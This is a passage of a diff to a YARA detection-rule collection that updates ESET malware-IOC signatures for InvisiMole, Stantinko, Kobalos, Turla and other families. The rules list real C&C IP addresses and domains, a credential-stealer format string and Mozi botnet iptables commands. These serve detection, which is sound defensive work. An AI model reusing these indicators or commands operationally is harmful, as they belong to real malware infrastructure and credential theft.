"9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" - hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" - logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L215-L255" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b" score = 75 quality = 80 - tags = "" + tags = "FILE" license = "BSD 2-Clause" + version = "1" strings: - $mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno" - $mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" + $s1 = "CryptProtectData" + $s2 = "CryptUnprotectData" + $s3 = {9E 01 3A AD} + $s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1" + $s5 = "PULSAR_LOADER.dll" + $check_magic_old_32 = {3? F9 FF D0 DE} + $check_magic_old_64 = {3? 64 FF D0 DE} + $check_magic_new_32 = {81 3? 86 DA 11 CE} + $check_magic_new_64 = {81 3? 64 DA 11 CE} condition: - any of them + (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and ( any of ($check_magic*)) and (2 of ($s*)) } -rule ESET_Linux_Rakos +import "pe" + +rule ESET_Apt_Windows_Invisimole_C2 : FILE { meta: - description = "Linux/Rakos.A executable" - author = "Peter Kálnai" - id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0" - date = "2016-12-13" - modified = "2016-12-19" - reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/rakos/rakos.yar#L33-L53" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d" + description = "InvisiMole C&C servers" + author = "ESET Research" + id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b" + date = "2021-05-17" + modified = "2021-05-17" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L257-L297" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8" score = 75 - quality = 80 - tags = "" - version = "1" - contact = "threatintel@eset.com" + quality = 78 + tags = "FILE" license = "BSD 2-Clause" + version = "1" strings: - $ = "upgrade/vars.yaml" - $ = "MUTTER" - $ = "/tmp/.javaxxx" - $ = "uckmydi" + $s1 = "46.165.220.228" ascii wide + $s2 = "80.255.3.66" ascii wide + $s3 = "85.17.26.174" ascii wide + $s4 = "185.193.38.55" ascii wide + $s5 = "194.187.249.157" ascii wide + $s6 = "195.154.255.211" ascii wide + $s7 = "153.re" ascii wide fullword + $s8 = "adstat.red" ascii wide + $s9 = "adtrax.net" ascii wide + $s10 = "akamai.sytes.net" ascii wide + $s11 = "amz-eu401.com" ascii wide + $s12 = "blabla234342.sytes.net" ascii wide + $s13 = "mx1.be" ascii wide fullword + $s14 = "statad.de" ascii wide + $s15 = "time.servehttp.com" ascii wide + $s16 = "upd.re" ascii wide fullword + $s17 = "update.xn--6frz82g" ascii wide + $s18 = "updatecloud.sytes.net" ascii wide + $s19 = "updchecking.sytes.net" ascii wide + $s20 = "wlsts.net" ascii wide + $s21 = "ro2.host" ascii wide fullword + $s22 = "2ld.xyz" ascii wide fullword + $s23 = "the-haba.com" ascii wide + $s24 = "82.202.172.134" ascii wide + $s25 = "update.xn--6frz82g" ascii wide condition: - 3 of them + (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and $s21 and any of them } -rule ESET_Mozi_Killswitch : FILE +rule ESET_Mumblehard_Packer { meta: - description = "Mozi botnet kill switch" - author = "Ivan Besina" - id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29" - date = "2023-09-29" - modified = "2023-10-31" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/mozi/mozi.yar#L32-L51" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49" + description = "Mumblehard i386 assembly code responsible for decrypting Perl code" + author = "Marc-Etienne M.Léveillé" + id = "981c18e3-ac28-54f5-97ab-44b1d12a1389" + date = "2015-04-07" + modified = "2015-05-01" + reference = "http://www.welivesecurity.com" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/mumblehard/mumblehard_packer.yar#L32-L47" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f" score = 75 quality = 80 - tags = "FILE" - license = "BSD 2-Clause" + tags = "" version = "1" strings: - $iptables1 = "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" - $iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP" - $haha = "/haha" - $networks = "/usr/networks" + $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-6] (56 5f | 89 F7) + 39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00 + 00 31 db 43 ac 30 d8 aa 43 e2 e2 } condition: - all of them and filesize <500KB + $decrypt } import "pe" @@ -121288,8 +122796,8 @@ rule ESET_Beds_Plugin date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L34-L51" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L34-L51" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "024cb91288f133e4cdf5993ac0477de6de76d38fa06f7affa348c6a28a4600da" score = 75 quality = 80 @@ -121313,8 +122821,8 @@ rule ESET_Beds_Dropper date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L53-L67" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L53-L67" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "4b5d121e182e3fddd766a7a1227c5de273995e9336156e7a6e8a17faad681bea" score = 75 quality = 80 @@ -121338,8 +122846,8 @@ rule ESET_Facebook_Bot : FILE date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L69-L100" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L69-L100" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "8ea779f90fa6080398403e3e6f9d342360c35e93c756ed43cb699f090106504e" score = 75 quality = 55 @@ -121380,8 +122888,8 @@ rule ESET_Pds_Plugins : FILE date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L102-L130" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L102-L130" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "26bbd380b72fb45206178639d67c8737b9984b140ba1048432949e159946c847" score = 75 quality = 80 @@ -121420,8 +122928,8 @@ rule ESET_Stantinko_Pdb date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L132-L148" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L132-L148" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "902c0ee086ce1a8def831d2f30c868165198c6c304faac3a93116a524f8e2fbf" score = 75 quality = 80 @@ -121448,8 +122956,8 @@ rule ESET_Stantinko_Droppers : FILE date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L150-L170" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L150-L170" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "c56fc85834a3e1bb1c14da37fb509c7de3009bf81d52800fe0093dc489f6deaa" score = 75 quality = 80 @@ -121477,8 +122985,8 @@ rule ESET_Stantinko_D3D date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L172-L187" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L172-L187" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "4e8da3f11df15e4aa469db62961ae390c4c4df2a5335eec0bdab19b14cc8343d" score = 75 quality = 80 @@ -121502,8 +123010,8 @@ rule ESET_Stantinko_Ihctrl32 date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L189-L209" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L189-L209" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "1829e08fb2289f738d0e75ad9977169e9a94379da764b1766f23fa47e8bc2543" score = 75 quality = 80 @@ -121534,8 +123042,8 @@ rule ESET_Stantinko_Wsaudio date = "2017-07-17" modified = "2017-07-20" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L211-L233" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L211-L233" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "45d92f1475f316ba50a9a4a3dd519d1186ed16c68bd2debe326736a1e3154562" score = 75 quality = 80 @@ -121552,547 +123060,907 @@ rule ESET_Stantinko_Wsaudio $s4 = "SOFTWARE\\Classes\\%s.FieldListCtrl.1\\" condition: - 2 of them + 2 of them +} +import "pe" + +rule ESET_Stantinko_Ghstore +{ + meta: + description = "No description has been set in the source file - ESET" + author = "ESET TI" + id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d" + date = "2017-07-17" + modified = "2017-07-20" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/stantinko/stantinko.yar#L235-L255" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4" + score = 75 + quality = 80 + tags = "" + Author = "Marc-Etienne M.Léveillé" + Description = "Stantinko ghstore component" + Contact = "github@eset.com" + License = "BSD 2-Clause" + + strings: + $s1 = "G%cost%sSt%c%s%s%ce%sr" wide + $s2 = "%cho%ct%sS%sa%c%s%crve%c" wide + $s3 = "Par%c%ce%c%c%s" wide + $s4 = "S%c%curity%c%s%c%s" wide + $s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide + + condition: + 3 of them +} +rule ESET_Kobalos +{ + meta: + description = "Kobalos malware" + author = "Marc-Etienne M.Léveillé" + id = "cdffbe3d-c19d-53a8-9051-48affae00c8a" + date = "2020-11-02" + modified = "2021-02-01" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/kobalos/kobalos.yar#L32-L56" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef" + score = 75 + quality = 80 + tags = "" + license = "BSD 2-Clause" + version = "1" + + strings: + $encrypted_strings_sizes = { + 05 00 00 00 09 00 00 00 04 00 00 00 06 00 00 00 + 08 00 00 00 08 00 00 00 02 00 00 00 02 00 00 00 + 01 00 00 00 01 00 00 00 05 00 00 00 07 00 00 00 + 05 00 00 00 05 00 00 00 05 00 00 00 0A 00 00 00 + } + $password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C } + $rsa_512_mod_header = { 10 11 02 00 09 02 00 } + $strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE } + + condition: + any of them +} +rule ESET_Kobalos_Ssh_Credential_Stealer +{ + meta: + description = "Kobalos SSH credential stealer seen in OpenSSH client" + author = "Marc-Etienne M.Léveillé" + id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a" + date = "2020-11-02" + modified = "2021-02-01" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/kobalos/kobalos.yar#L58-L73" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10" + score = 75 + quality = 80 + tags = "" + license = "BSD 2-Clause" + version = "1" + + strings: + $ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s" + + condition: + any of them +} +rule ESET_Dino +{ + meta: + description = "No description has been set in the source file - ESET" + author = "ESET TI" + id = "77d0a039-f60c-59ea-bad6-5b4b630007bb" + date = "2015-07-14" + modified = "2015-08-17" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/animalfarm/animalfarm.yar#L73-L96" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f" + score = 75 + quality = 80 + tags = "" + Author = "Joan Calvet" + Description = "Dino backdoor" + Contact = "github@eset.com" + License = "BSD 2-Clause" + + strings: + $ = "PsmIsANiceM0du1eWith0SugarInsideA" + $ = "destroyPSM" + $ = "FM_PENDING_DOWN_%X" + $ = "%s was canceled after %d try (reached MaxTry parameter)" + $ = "you forgot value name" + $ = "wakeup successfully scheduled in %d minutes" + $ = "BD started at %s" + $ = "decyphering failed on bd" + + condition: + any of them +} +import "pe" + +rule ESET_Gazer_Certificate_Subject +{ + meta: + description = "Turla Gazer malware" + author = "ESET Research" + id = "a7719333-b341-538c-a8ed-5c50b653a765" + date = "2017-08-30" + modified = "2017-08-29" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/gazer.yar#L33-L46" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec" + score = 75 + quality = 80 + tags = "" + contact = "github@eset.com" + license = "BSD 2-Clause" + + condition: + for any i in (0..pe.number_of_signatures-1) : (pe.signatures[i].subject contains "Solid Loop" or pe.signatures[i].subject contains "Ultimate Computer Support") +} +import "pe" + +rule ESET_Gazer_Certificate : FILE +{ + meta: + description = "Turla Gazer malware" + author = "ESET Research" + id = "e90bbe53-4e7f-59c4-a505-4893150bf824" + date = "2017-08-30" + modified = "2017-08-29" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/gazer.yar#L48-L65" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea" + score = 75 + quality = 80 + tags = "FILE" + contact = "github@eset.com" + license = "BSD 2-Clause" + + strings: + $certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02} + $certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c} + + condition: + ( uint16(0)==0x5a4d) and 1 of them and filesize <2MB +} +import "pe" + +rule ESET_Gazer_Logfile_Name : FILE +{ + meta: + description = "Turla Gazer malware" + author = "ESET Research" + id = "3e1454e9-dddf-5197-b486-b96d725fdb58" + date = "2017-08-30" + modified = "2017-08-29" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/gazer.yar#L67-L85" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478" + score = 75 + quality = 80 + tags = "FILE" + contact = "github@eset.com" + license = "BSD 2-Clause" + + strings: + $s1 = "CVRG72B5.tmp.cvr" + $s2 = "CVRG1A6B.tmp.cvr" + $s3 = "CVRG38D9.tmp.cvr" + + condition: + ( uint16(0)==0x5a4d) and 1 of them +} +import "pe" + +rule ESET_Turla_Outlook_Gen +{ + meta: + description = "Turla Outlook malware" + author = "ESET Research" + id = "efef2443-c941-54c2-abfa-bbe29c53d930" + date = "2018-05-09" + modified = "2018-09-05" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/turla-outlook.yar#L42-L74" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "f709e517e9d957775601670c426cc9def1c4104cb1ff647d269800d2af4372c7" + score = 75 + quality = 78 + tags = "" + version = 2 + contact = "github@eset.com" + license = "BSD 2-Clause" + + strings: + $s1 = "Outlook Express" ascii wide + $s2 = "Outlook watchdog" ascii wide + $s3 = "Software\\RIT\\The Bat!" ascii wide + $s4 = "Mail Event Window" ascii wide + $s5 = "Software\\Mozilla\\Mozilla Thunderbird\\Profiles" ascii wide + $s6 = "%%PDF-1.4\n%%%c%c\n" ascii wide + $s7 = "%Y-%m-%dT%H:%M:%S+0000" ascii wide + $s8 = "rctrl_renwnd32" ascii wide + $s9 = "NetUIHWND" ascii wide + $s10 = "homePostalAddress" ascii wide + $s11 = "/EXPORT;OVERRIDE;START=-%d;END=-%d;FOLDER=%s;OUT=" ascii wide + $s12 = "Re:|FWD:|AW:|FYI:|NT|QUE:" ascii wide + $s13 = "IPM.Note" ascii wide + $s14 = "MAPILogonEx" ascii wide + $s15 = "pipe\\The Bat! %d CmdLine" ascii wide + $s16 = "PowerShellRunner.dll" ascii wide + $s17 = "cmd container" ascii wide + $s18 = "mapid.tlb" ascii wide nocase + $s19 = "Content-Type: F)*+" ascii wide fullword + + condition: + ESET_Not_Ms_PRIVATE and 5 of them +} +import "pe" + +rule ESET_Turla_Outlook_Filenames +{ + meta: + description = "Turla Outlook filenames" + author = "ESET Research" + id = "3a08003d-50d6-5fdf-9f74-222335ebfa3e" + date = "2018-08-22" + modified = "2018-09-05" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/turla-outlook.yar#L76-L91" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "3be86c9325de6634c032321beed131fdf1e1952afcb43258fb202d0097610501" + score = 75 + quality = 80 + tags = "" + contact = "github@eset.com" + license = "BSD 2-Clause" + + strings: + $s1 = "mapid.tlb" + $s2 = "msmime.dll" + $s3 = "scawrdot.db" + + condition: + any of them +} +import "pe" + +rule ESET_Turla_Outlook_Log +{ + meta: + description = "First bytes of the encrypted Turla Outlook logs" + author = "ESET Research" + id = "b0031c08-8418-5a02-8a2c-daa7236f46f0" + date = "2018-08-22" + modified = "2018-09-05" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/turla-outlook.yar#L93-L107" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "e7dc00c33a643c0940aaea2096d099192b27df3c81c518f1dc2b3d45a0a74312" + score = 75 + quality = 80 + tags = "" + contact = "github@eset.com" + license = "BSD 2-Clause" + + strings: + $s1 = {01 87 C9 75 C8 69 98 AC E0 C9 7B [21] EB BB 60 BB 5A} + + condition: + $s1 at 0 +} +import "pe" + +rule ESET_Turla_Outlook_Exports +{ + meta: + description = "Export names of Turla Outlook Malware" + author = "ESET Research" + id = "6df4f75e-711a-539d-94bf-9e4e2063ecd4" + date = "2018-08-22" + modified = "2018-09-05" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/turla-outlook.yar#L109-L125" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "a961fdb43ea1e99b308f55b8f5e264b1f3fa817eaf463d512e2ad8b98a18ee99" + score = 75 + quality = 80 + tags = "" + contact = "github@eset.com" + license = "BSD 2-Clause" + + condition: + (pe.exports("install") or pe.exports("Install")) and pe.exports("TBP_Initialize") and pe.exports("TBP_Finalize") and pe.exports("TBP_GetName") and pe.exports("DllRegisterServer") and pe.exports("DllGetClassObject") } import "pe" -rule ESET_Stantinko_Ghstore +rule ESET_Generic_Carbon : FILE { meta: - description = "No description has been set in the source file - ESET" - author = "ESET TI" - id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d" - date = "2017-07-17" - modified = "2017-07-20" + description = "Turla Carbon malware" + author = "ESET Research" + id = "efdc0d16-a974-5c00-a401-391d60f3081e" + date = "2017-03-30" + modified = "2017-03-30" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/stantinko/stantinko.yar#L235-L255" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/carbon.yar#L33-L51" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "6481ccafb7c7c78bc52d01881cb96f3aa6209fdd35e090bdc9d5f5105b4e38ea" score = 75 quality = 80 - tags = "" - Author = "Marc-Etienne M.Léveillé" - Description = "Stantinko ghstore component" - Contact = "github@eset.com" - License = "BSD 2-Clause" + tags = "FILE" + contact = "github@eset.com" + license = "BSD 2-Clause" strings: - $s1 = "G%cost%sSt%c%s%s%ce%sr" wide - $s2 = "%cho%ct%sS%sa%c%s%crve%c" wide - $s3 = "Par%c%ce%c%c%s" wide - $s4 = "S%c%curity%c%s%c%s" wide - $s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide + $s1 = "ModStart" + $t1 = "STOP|OK" + $t2 = "STOP|KILL" condition: - 3 of them + ( uint16(0)==0x5a4d) and (1 of ($s*)) and (1 of ($t*)) } -import "elf" +import "pe" -rule ESET_Libkeyutils_With_Ctor +rule ESET_Carbon_Metadata { meta: - description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY." - author = "ESET, spol. s r.o." - id = "7b466bf7-f895-569d-99b0-eca95a6ebc83" - date = "2024-02-01" - modified = "2024-04-29" + description = "Turla Carbon malware" + author = "ESET Research" + id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2" + date = "2017-03-30" + modified = "2017-03-30" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/ebury.yar#L3-L54" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e7debd6e453192ad8376db5bab03ed0d87566591" - logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/carbon.yar#L53-L69" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "81b59e9566f3b3356acf12dadb80abdcbee28e0b1a9efead66fcb95bf6fc1aa5" score = 75 quality = 80 tags = "" + contact = "github@eset.com" license = "BSD 2-Clause" - version = 2 - - strings: - $libname = "libkeyutils.so.1" condition: - for any ptr_size in (4,8) : (((ptr_size==4 and elf.machine==elf.EM_386) or (ptr_size==8 and elf.machine==elf.EM_X86_64)) and for any d in elf.dynamic : (d.type==elf.DT_SONAME and ( for any s in elf.sections : (s.name==".dynstr" and $libname at (s.offset+d.val)) or for any s in elf.dynamic : (s.type==elf.DT_STRTAB and $libname at (s.val+d.val)))) and ( for any s in elf.sections : (s.name==".ctors" and s.size>2*ptr_size) or for any d in elf.dynamic : (d.type==elf.DT_INIT_ARRAYSZ and d.val>ptr_size))) + (pe.version_info["InternalName"] contains "SERVICE.EXE" or pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or pe.version_info["InternalName"] contains "MSXIML.DLL") and pe.version_info["CompanyName"] contains "Microsoft Corporation" } -import "elf" +import "pe" -rule ESET_Ebury_V1_7_Crypto +rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023 { meta: - description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8" - author = "ESET, spol. s r.o." - id = "93dadf5f-b572-5217-8c82-4957c6d24955" - date = "2023-08-01" - modified = "2024-04-29" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/ebury.yar#L56-L97" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e7debd6e453192ad8376db5bab03ed0d87566591" - logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66" + description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12" + author = "ESET Research" + id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094" + date = "2023-03-31" + modified = "2023-04-19" + reference = "https://github.com/eset/malware-ioc" + source_url = 